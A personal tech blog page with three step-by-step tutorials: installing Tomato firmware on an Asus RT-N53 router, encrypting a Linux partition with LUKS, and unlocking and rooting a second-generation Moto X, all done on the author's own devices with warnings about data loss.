September 27, 2016

How to install Tomato Firmware on Asus RT-N53 Router

Filed under: Computer Software,Knowledgebase,Tech Related,Tutorials — Suramya @ 11:43 PM

I know I am supposed to blog about all the trips I took, but I wanted to get this down before I forget what I did to get the install working. I will post about the trips soon. I promise 🙂

Installing an alternate firmware on my router is something I have been meaning to do for a few years now but never really had the incentive to investigate in detail as the default firmware worked fine for the most part and I didn’t really miss any of the special features I would have gotten with the new firmware.

Yesterday my router decided to start acting up: every time I started transferring large files from my phone to the desktop via SFTP over WiFi, the entire router would crash after about a minute or so. This is something that hadn't happened before and I have transferred gigs of data this way, so I was stumped. Luckily I had a spare router lying around thanks to Dad, who made me carry it to Bangalore during my last visit. So I swapped the old router with the spare and got my work done. This also gave me an opportunity, as I now had a spare router sitting on my desk and some time to kill, so I decided to install a custom firmware on it to play with.

I was initially planning on installing DD-WRT on it, but their site was refusing to let me download the file for the RT-N53 model even though the wiki said it should be supported. A quick web search suggested that folks have had a good experience with the Tomato by Shibby firmware, so I downloaded and installed it by following these steps:

Download the firmware file

First we need to download the firmware file from the Tomato Download site.

  • Visit the Tomato download Section
  • Click on the latest Build folder. (I used build5x-138-MultiWAN)
  • Click on ‘Asus RT-Nxx’ folder
  • Download the ‘MAX’ zip file as that has all the functionality. (I used the tomato-K26-1.28.RT-N5x-MIPSR2-138-Max.zip file.)
  • Save the file locally
  • Extract the ZIP file. The file we are interested in is under the ‘image’ folder with a .trx extension

Restart the Router in Maintenance mode

  • Turn off power to router
  • Turn the power back on while holding down the reset button
  • Keep holding reset until the power light starts flashing which will mean router is in recovery mode

Set a Static IP on the Ethernet adapter of your computer

For some reason, you need to set the IP address of the computer you are using to a static IP of 192.168.1.2 with subnet mask 255.255.255.0 and gateway 192.168.1.1. If you skip this step the firmware upload fails with an integrity check error.
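On a Linux machine this can be done temporarily from the command line; a rough sketch as root, assuming the wired interface is named eth0 (check yours with ip link):

ip addr add 192.168.1.2/24 dev eth0
ip route replace default via 192.168.1.1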

Upload the new firmware

  • Connect the router to a computer using a LAN cable
  • Visit 192.168.1.1
  • Login as admin/admin
  • Click Advanced Setting from the navigation menu at the left side of your screen.
  • Under the Administration menu, click Firmware Upgrade.
  • In the New Firmware File field, click Browse to locate the new firmware file that you downloaded in the previous step
  • Click Upload. The uploading process takes about 5 minutes.
  • Then unplug the router, wait 30 seconds.
  • Hold down the WPS button while plugging it back in.
  • Wait 30 seconds and release the WPS button.

Now you should be using the new firmware.

  • Browse to 192.168.1.1
  • Login as admin/password (if that doesn’t work try admin/admin)
  • Click on the ‘reset nvram to defaults’ link in the page that comes up. (I had to do this before the system started working but apparently its not always required.)

Configure your new firmware

That's it, you now have a router with a working Tomato install. Go ahead and configure it as per your requirements. All functionality seems to be working for me except the 5GHz network, which seems to have disappeared. I will play around with the settings a bit more to see if I can get it to work, but as I hardly ever connected to the 5GHz network it's not a big deal for me.

References

Several other sites and posts helped me complete the install successfully; without them I would have spent way longer getting things to work.

Well this is it for now. Will post more later.

– Suramya

February 20, 2016

How to encrypt your Hard-drive in Linux

We have all heard stories where someone loses a pen drive or a laptop containing sensitive/private data, which is then published by the person who found the drive, embarrassing the owner of the data. The best way to prevent something like that from happening to you if you lose a disk is to make sure all your data is encrypted. Historically this used to be quite painful to set up and required a lot of technical know-how. Thankfully this is no longer the case. After trying a bunch of different options I found Linux Unified Key Setup-on-disk-format (LUKS) to be the most user-friendly and easy-to-set-up option for me.

Setting it up is quite easy by following the instructions over at www.cyberciti.biz. However, since things on the internet have a tendency to disappear on a fairly frequent basis, I am using this post to save a paraphrased version of the installation instructions (along with my notes/comments) just in case the original site goes down and I need to reinstall. All credit goes to the original author. So without further ado, here we go:

Install cryptsetup

First we need to install the cryptsetup utility, which contains all the tools we need to encrypt our drive. To install it on Debian/Ubuntu, issue the following command as root:

apt-get install cryptsetup

Configure LUKS partition

Warning: This will remove all data on the partition that you are encrypting. So make sure you have a working backup before proceeding, and don't blame me if you manage to destroy your data/device.

Run the following command as root to start the encryption process:

cryptsetup -y -v luksFormat <device>

where <device> is the partition we want to encrypt (e.g. /dev/sda1). The command will ask you for confirmation and a passphrase. This passphrase is not recoverable, so make sure you don't forget it.

Create drive mapping

Once the previous command completes you need to create a mapping of the encrypted drive by issuing the following command:

cryptsetup luksOpen <device> backup2

You can also map a partition using its UUID (which is what I do) by issuing the following command instead (this works great if you want to script automated backups to an external drive):

cryptsetup luksOpen UUID=88848060-fab7-4e9e-bac2-f9a2323c7c29 backup2

Replace the UUID in the example with the UUID of your drive. (Instructions on how to find the UUID are available here).
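For quick reference, the UUID of a partition can be listed with blkid as root (the device name is just an example):

blkid /dev/sda1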

Use the following command to see the status for the mapping and to check if the command succeeded:

cryptsetup -v status backup2

Format LUKS partition

Now that we have created the mapping, we need to write zeroes to the encrypted device to ensure that the outside world sees it as random data, which protects against disclosure of usage patterns. Do this by issuing the following command:

dd if=/dev/zero of=/dev/mapper/backup2

Since this command can take a long time to complete depending on the drive size, and dd by default doesn't give any feedback on the percentage completed/remaining, I recommend using the pv command to monitor the progress by issuing the following command instead:

pv -tpreb /dev/zero | dd of=/dev/mapper/backup2 bs=128M

This will take a while to run, so you can go for a walk or read a book while it completes. Once the command finishes, you can create a filesystem on the device (I prefer ext4, but you can use any filesystem you like) by formatting it:

mkfs.ext4 /dev/mapper/backup2

After the filesystem is created you can mount and use the partition as usual by issuing the following command:

mount /dev/mapper/backup2 /mnt/backup

That's it. You now have an encrypted partition that shows up as a regular partition in Linux and that you can use like a regular drive without having to worry about anything. No special changes are needed to use this partition, which means any software can use it without modification.

How to unmount and secure the data

After you are done transferring data to/from the drive you can unmount and secure the partition by issuing the following commands as root:

umount /mnt/backup

followed by

cryptsetup luksClose backup2

Creating a backup of the LUKS headers

Before you do anything else, you should create a backup copy of the LUKS header, because if the header gets corrupted then all data in the encrypted partition is lost forever with no way to recover it. From the cryptsetup man page:

“LUKS header: If the header of a LUKS volume gets damaged, all data is permanently lost unless you have a header-backup. If a key-slot is damaged, it can only be restored from a header-backup or if another active key-slot with known passphrase is undamaged. Damaging the LUKS header is something people manage to do with surprising frequency. This risk is the result of a trade-off between security and safety, as LUKS is designed for fast and secure wiping by just overwriting header and key-slot area.”

Create a backup by issuing the following command:

cryptsetup luksHeaderBackup <device> --header-backup-file <file>

Important note: a LUKS header backup can grant access to most or all data, therefore you need to make sure that nobody has access to it.

In case of disaster where our LUKS header gets broken, we can restore it by issuing the following command:

cryptsetup luksHeaderRestore <device> --header-backup-file <file>

How to remount the encrypted partition?

Issue the following commands in sequence to mount the partition:

cryptsetup luksOpen <device> backup2
mount /dev/mapper/backup2 /mnt/backup

Please note that data encrypted by LUKS is quite obviously encrypted, with most Linux systems identifying it as an encrypted partition automatically. So if someone examines your system they will know you have encrypted data and can try to force you to divulge the password by various means (including the use of rubber-hose cryptanalysis).

If you want the encrypted partition to be hidden, you can use deniable encryption/hidden partitions or steganography. I haven't really used either, so I can't comment on how to set them up correctly, but maybe I can talk about it in a future post after I explore them a bit more.

Well this is all for now, hope you find this useful. Will write more later.

– Suramya

May 6, 2015

How to Root a second generation Moto x running Lollipop

Filed under: Knowledgebase,Tech Related,Tutorials — Suramya @ 11:22 PM

I got my new phone today and as usual the first thing I did was root it, before copying any data over, so that I wouldn't lose data when I unlocked the boot loader. The process required a bit of work, mainly because I was following instructions for KitKat while my phone was running Lollipop. That caused the phone to go into a funky state where the Play Store APIs went MIA and the entire thing stopped working, to the point that I had to do a hard reset to get back to a stable state.

BTW, before you continue, please note that this will delete all data on the phone, so you need to ensure that you have a proper backup before proceeding. Without further ado, here are the steps I followed to get things working using my Linux (Debian) desktop:

Unlock the Bootloader

The first thing you have to do is unlock the boot loader on the phone:

  • Install the Android SDK by issuing the following command:
    apt-get install android-tools-adb android-tools-fastboot
  • Run the following command:
    fastboot oem get_unlock_data
  • Take the string returned, which would look something like this:
    (bootloader) 0A40040192024205#4C4D3556313230
    (bootloader) 30373731363031303332323239#BD00
    (bootloader) 8A672BA4746C2CE02328A2AC0C39F95
    (bootloader) 1A3E5#1F53280002000000000000000
    (bootloader) 0000000

    and concatenate the 5 lines of output into one continuous string without (bootloader) or ‘INFO’ or white spaces. Your string needs to look like this:
    0A40040192024205#4C4D355631323030373731363031303332323239#BD008A672BA4746C2CE02328A2AC0C39F951A3E5#1F532800020000000000000000000000

  • Visit the Motorola Website.
  • Paste the string you got in the previous step on the site, and then click on the ‘Can my Device be Unlocked?’ button and if your device is unlockable, a “REQUEST UNLOCK KEY” button will now appear at the bottom of the page.
  • Click on the “REQUEST UNLOCK KEY” Button.
  • You will now receive a mail with the unlock key at your registered email address
  • Start your device in fastboot mode by pushing and holding the power and volume down at the same time. Then release the power button followed by the volume down button. The device will now power up in fastboot mode.
  • Run the following command to unlock the bootloader, replacing UNIQUE_KEY with the key you received in the email:
    fastboot oem unlock UNIQUE_KEY
  • If the code was correct then you will see a message confirming that your device was unlocked and the phone will reboot.

Enable Developer Options/USB Debugging

In order to proceed further we need to enable USB debugging, and to do that we first need to enable Developer Options by following these steps:

  • Pull down the notification drawer and tap on ‘Settings’
  • Scroll down to ‘About Phone’
  • Now scroll down to ‘Build Number’
  • Tap on ‘Build Number’ 7 times.
  • It'll now say that you are a developer. Now press back; you should see Developer Options above About Phone.

  • Click on ‘Developer Options’
  • Check the box next to ‘USB debugging’ and save
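To confirm that USB debugging is working before going further, you can check whether the phone shows up over adb (assuming it is connected over USB and you accepted the debugging prompt on the phone):

adb devices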

Root the Phone

First we need to download the correct boot image for your phone model. I had to look up my model on Wikipedia because for some reason my phone decided not to share that information with me. Use the appropriate link for your model in the list below; I have an XT1092, but the XT1097 image worked fine for me.

After downloading the file, extract it. Run the following command:

adb reboot bootloader

This will restart the phone in the fastboot mode. Then boot using the image you downloaded in the previous step using this command:

fastboot boot /path/to/image/file/CF-Auto-Root-victara-victararetbr-xt1097.img

Once you run the command the device will boot up, install su and quickly reboot (this is automatic; no user intervention is required). After the phone starts up, you need to install Chainfire's SuperSU from the Play Store.

After that you are done and your phone is rooted. You can verify this by installing a 'Root Verifier' application from the store.

Well this is all for now, will write more later.

– Suramya
